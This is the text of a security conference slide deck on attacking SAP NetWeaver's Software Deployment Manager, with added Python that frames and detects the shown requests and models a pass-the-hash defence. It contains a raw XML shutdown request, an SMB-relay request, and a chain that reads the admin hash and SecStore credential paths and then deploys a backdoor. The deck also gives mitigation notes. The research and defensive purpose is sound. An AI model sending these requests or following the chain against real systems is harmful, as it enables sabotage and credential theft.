SAP is the most popular business application, with more than two hundred forty thousand installations all over the world. Companies spend enormous amounts of money to install it and then forget about security. Yet all business processes run in the ERP system, and all critical information (finances, HR, clients) is stored there; not caring about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure (NWDI) is a complex component. It combines the characteristics and advantages of local development environments with a server-based development landscape, centrally providing the means to support the software, implement new features, manage the product lifecycle, etc. Its main aim is to control the deployment of components in the system landscape in a standardized manner.
The key component of the DI scheme is the Software Deployment Manager (SDM). It is directly connected to the production systems, which is why it is so critical.
The presentation describes the special features of SDM and provides several SDM attack scenarios along with ways to prevent them.
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server
1. Invest in security to secure investments
Injecting evil code in your SAP J2EE systems: Security of SAP Software Deployment Server
Dmitry Chastukhin, Director of SAP pentest/research team, ERPScan
2. About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
3. SAP
• The most popular business application
• More than 250000 customers worldwide
• 83% of Forbes 500 companies run SAP
• Main system - ERP
• 3 platforms:
- NetWeaver ABAP
- NetWeaver J2EE
- BusinessObjects
4. SAP insecurity
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data
Fraud
• False transactions
• Modification of master data
Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations
5. SAP vulnerabilities
(Chart: number of SAP vulnerabilities per year, 2001-2014; y-axis 0-900.) More than 2800 in total. Source: SAP Security in Figures
6. Is it remotely exploitable?
> 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SAP Host Control, etc.
sapscan.com
7. What about other services?
(Chart: exposed instances, scale 0-9, for SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd.) Source: SAP Security in Figures
8. SAP Application servers
• SAP NetWeaver ABAP
• SAP NetWeaver J2EE
– SAP Portal
– SAP Solution Manager
– SAP NetWeaver Development Infrastructure (NWDI)
• SAP BusinessObjects
• SAP HANA Extended Application Services
• SAP SUP
• SAP Fiori
9. SAP NetWeaver development infrastructure
• Design Time Repository (DTR)
• Component Build Service (CBS)
• Change Management Service (CMS)
• System Landscape Directory (SLD) / NS
• Software Deployment Manager (SDM)
16. Software Deployment Manager
• Single interface for the deployment
• Deploy apps (*.ear, *.war, *.sda)
• Implement custom patches
17. SDM server
• Different server modes
– standalone
– integrated
• Only one user at a time
• Only hardcoded admin user
• Three ports (instance number 00):
– 50017 - Admin Port
– 50018 - GUI Port
– 50019 - HTTP Port
18. SDM client
• Browsing the distribution of deployed components
• Deploying and undeploying
• Log viewing
19. SDM attack intro
• SAP infrastructure includes many Java services
• Almost all Java stuff uses UME
• Universal user with a password
• Only one user at a time
• Ability to deploy evil code => plus, see 1st item
21. SDM attack intro
• SAP has its own SAP Java Virtual Machine (JVM)
• Java 6 has Attach API
• Attach to another running JVM
• Intercept and modify calls
22. Attack SAP SDM. DoS
• If an attacker uses an incorrect password 3 times, the server will shut down automatically
• Also, if you send this request, you can shut down the SDM server manually:
[10 spaces]56<?xml version="1.0"?>
<ShutDownRequest></ShutDownRequest>
23. Attacking SAP SDM. SMB relay
Packet:
[10 Spaces]<?xml version="1.0"?>
<FileAccessRequest f="ip_addrblabla"> </FileAccessRequest>
An old trick, but sometimes it's very useful
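The two requests shown on slides 22 and 23 are plain XML sent to the SDM admin port. The following is an added example, not code from the talk or from SAP: it builds those requests and classifies captured ones, which is what a detection rule on SDM port traffic would do. It assumes, from the slide text, that a request is ten ASCII spaces, the decimal byte length of the XML payload, then the payload (the slide's "56" is exactly the length of the XML declaration plus `<ShutDownRequest></ShutDownRequest>` with no newline between them; slide 23 omits the number, and the same framing is assumed there). The UNC-path check for the SMB relay case and the host/share values are my constructions.

```python
"""Added example (not from the talk): frame and inspect the XML requests
the slides show for the SDM admin port.

Framing assumption, inferred from the slide text: ten spaces, the decimal
length of the XML payload, then the payload. Values below are constructed.
"""
import re
from xml.etree import ElementTree as ET
from xml.sax.saxutils import quoteattr

XML_DECL = '<?xml version="1.0"?>'
SDM_PREFIX = b" " * 10
# Windows UNC path (\\host\share...), the usual trigger for an SMB relay.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def frame_sdm_request(body_xml: str) -> bytes:
    """Return prefix + decimal payload length + payload, as on the slides."""
    payload = (XML_DECL + body_xml).encode()
    return SDM_PREFIX + str(len(payload)).encode() + payload


def shutdown_request() -> bytes:
    """The request slide 22 says stops the SDM server."""
    return frame_sdm_request("<ShutDownRequest></ShutDownRequest>")


def file_access_request(path: str) -> bytes:
    """The request slide 23 uses; quoteattr keeps the path a valid attribute."""
    return frame_sdm_request(
        f"<FileAccessRequest f={quoteattr(path)}></FileAccessRequest>")


def parse_sdm_frame(data: bytes):
    """Split a frame into (declared_len, root tag, attributes).

    Returns None if the prefix is missing or the declared length does not
    match the payload, so a stray HTTP request is not misread as SDM.
    """
    m = re.match(rb"^ {10}(\d+)(.*)$", data, re.S)
    if not m:
        return None
    declared, payload = int(m.group(1)), m.group(2)
    if len(payload) != declared:
        return None
    root = ET.fromstring(payload)
    return declared, root.tag, dict(root.attrib)


def classify(data: bytes) -> str:
    """Label a captured request for a monitoring rule."""
    parsed = parse_sdm_frame(data)
    if parsed is None:
        return "not-sdm-frame"
    _, tag, attrs = parsed
    if tag == "ShutDownRequest":
        return "shutdown"            # slide 22: remote DoS
    if tag == "FileAccessRequest":
        if UNC_RE.match(attrs.get("f", "")):
            return "file-access-unc"  # slide 23: SMB relay to a remote host
        return "file-access"
    return "other:" + tag


if __name__ == "__main__":
    print(shutdown_request())
    print(classify(file_access_request(r"\\10.0.0.5\share\x")))
```

Anything on the network that can reach the admin port can send these, so the check that matters is whether 5NN17 is reachable from anywhere other than the administration hosts; a frame whose declared length does not match its payload is rejected rather than parsed, which keeps the classifier from being fed malformed XML.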
24. Prevention
• Install note 1724516
• Enable the security features of SDM
• SDM server and SDM client need to be updated
https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
25. From Nobody to Administrator
Now, I will show an interesting attack:
Compromise some SAP services -> Compromise SAP SDM -> Compromise SAP server OS -> Compromise SAP
26. SDM authentication abuse
• OK. Let's see how authentication in SDM works:
– user enters password
– hash is calculated locally on client
– password hash is sent to server
– hash is compared to hash from configuration file
Pass the hash attack here!
30. Attack on SAP SDM
Read sdmrepository.sdc -> Get password hash -> Use hash as password to authenticate on SDM server -> Deploy backdoor on SAP server -> PROFIT!
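Slides 26 and 30 describe why reading the hash out of sdmrepository.sdc is enough: the client sends the hash and the server compares it with the stored one, so the stored value is itself the credential. The following is an added example, not the talk's code and not SDM's real implementation: a minimal model of that flow next to a design in which the stored value is a verifier the server derives from the password, so a copy of the repository file cannot be replayed. SHA-256 stands in for SDM's unspecified hash, the repository is modelled as a dict, and the password is constructed.

```python
"""Added example (not from the talk, not SDM code): pass-the-hash against
a hash-comparison login, and a verifier design that resists it.

Assumptions: SHA-256 stands in for SDM's hash; the repository is a dict;
the password is constructed.
"""
import hashlib
import hmac
import os


def sdm_style_hash(password: str) -> str:
    """Stand-in for the hash the client computes locally (slide 26)."""
    return hashlib.sha256(password.encode()).hexdigest()


class SdmStyleServer:
    """Accepts whoever presents the same hash that is stored in the repository."""

    def __init__(self, admin_password: str):
        # what the attacker reads out of sdmrepository.sdc on slide 30
        self.repository = {"admin": sdm_style_hash(admin_password)}

    def login(self, user: str, presented_hash: str) -> bool:
        stored = self.repository.get(user, "")
        return hmac.compare_digest(stored, presented_hash)


class VerifierServer:
    """Stores a salted, iterated verifier and hashes server-side.

    The client must send the password itself (over a TLS channel), so the
    stored value is not reusable as a credential.
    """

    def __init__(self, admin_password: str, iterations: int = 100_000):
        self.salt = os.urandom(16)
        self.iterations = iterations
        self.repository = {"admin": self._verifier(admin_password)}

    def _verifier(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac(
            "sha256", password.encode(), self.salt, self.iterations)

    def login(self, user: str, presented_password: str) -> bool:
        stored = self.repository.get(user, b"")
        return hmac.compare_digest(stored, self._verifier(presented_password))


def demo(password: str = "constructed-admin-pw") -> dict:
    """Legitimate login and repository-file replay against both designs."""
    weak = SdmStyleServer(password)
    stolen_hash = weak.repository["admin"]          # read from the config file
    strong = VerifierServer(password)
    stolen_verifier = strong.repository["admin"].hex()
    return {
        "legit_login_weak": weak.login("admin", sdm_style_hash(password)),
        "pass_the_hash_weak": weak.login("admin", stolen_hash),  # no password needed
        "legit_login_strong": strong.login("admin", password),
        "replay_stolen_verifier_strong": strong.login("admin", stolen_verifier),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

A challenge-response scheme keyed on the stored hash would not help, because the stored hash would still be the secret an attacker needs; what matters is that the repository holds a verifier and not the thing the client transmits. The file-read primitives on slide 31 still hand an attacker the repository, so the SAP notes and the SDM security features from the prevention slides remain the fix for the product itself.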
31. File read
• OS command execution through CTC (Notes 1467771, 1445998)
• XML External Entities (Note 1619539)
• Directory Traversal (Note 1630293)
• Through MMC file read function (Notes 927637 and 1439348)
We have something new for you :)
32. SAP Log Viewer standalone
• Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket)
• You can:
– View log on local server
– View log on remote server
– Register file as log file
Read log file without authentication!
33. SAP Log Viewer standalone
Attack is pretty easy:
Connect to LogViewer standalone server -> Register sdmrepository.sdc file as log file -> Read it
42. Prevention
• Install Notes 1724516, 1685106
• Enable the security features of SDM
• SDM server and SDM client need to be updated
https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
43. "The Software Deployment Manager (SDM) uses the database connection information, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as software deployment and undeployment".
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
Wow! J2EE Engine administrator user and password. Where is all this stuff located? SAP SecStore
44. SAP SecStore
"By default, the J2EE Engine stores secure data in the file /usr/sap/<SID>/SYS/global/security/data/SecStore.properties in the file system".
"The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm".
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
OK. Let's try to read SecStore.properties
45. SAP SecStore
• We can execute any OS command (we have our backdoor)
• We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: /usr/sap/<SID>/SYS/global/security/data/SecStore.properties
• It's all that we need
51. SAP Guides
It's all in your hands:
Regular security assessments
ABAP code review
Monitoring technical security
Segregation of Duties
Security events monitoring
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
52. Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure.
Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
web: www.erpscan.com
e-mail: info@erpscan.com, sales@erpscan.com